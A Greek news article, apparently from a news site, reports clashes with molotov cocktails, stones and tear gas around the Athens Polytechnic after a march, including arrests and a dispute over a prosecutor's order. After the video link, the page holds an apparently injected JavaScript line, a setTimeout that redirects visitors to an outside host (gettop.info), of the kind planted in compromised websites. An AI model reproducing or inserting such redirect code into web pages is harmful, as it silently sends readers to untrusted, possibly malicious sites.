Πολυτεχνείο: Οδοφράγματα, μολότοφ και δακρυγόνα (BINTEO)

0
7

Ενώ η πορεία ολοκληρώθηκε εν ειρήνη έξω από την αμερικανική πρεσβεία, επεισόδια ξέσπασαν στους δρόμους γύρω από το Πολυτεχνείο, όπου νεαροί κουκουλοφόροι έκαψαν και μια ελληνική σημαία.

Στη συμβολή των οδών Πατησίων και Στουρνάρη, άγνωστοι νεαροί συγκρούστηκαν με τις δυνάμεις των ΜΑΤ πετώντας βόμβες μολότοφ, πέτρες και ξύλα.

Σύμφωνα με τις πληροφορίες πρόκειται για 100 άτομα τα οποία εξέρχονται από το κτίριο Γκίνη που τελεί υπό κατάληψη από νωρίς το μεσημέρι και πετούν αντικείμενα και μετά οπισθοχωρούν στον χώρο του Πολυτεχνείου.

Μέχρι στιγμής τα επεισόδια περιορίζονται στους δρόμους γύρω από το Πολυτεχνείο,ενώ έχουν γίνει τρεις συλλήψεις και δύο προσαγωγές.

Αναστάτωση επικράτησε όταν υπήρξε πληροφορία ότι ο εισαγγελέας έδωσε εντολή σε αστυνομικές δυνάμεις να παρέμβουν. Τελικά σύμφωνα με πηγές του υπουργείου Προστασίας του Πολίτη, δεν υπάρχει εντολή του εισαγγελέα για παρέμβαση των αστυνομικών δυνάμεων εντός του Πολυτεχνείου.

Οι ίδιες πηγές αναφέρουν πως η εντολή που υπάρχει είναι οι αστυνομικοί να ενημερώνουν τον εισαγγελέα για το αν τελούνται αξιόποινες πράξεις.

https://youtu.be/bWqiPUdq_20 setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here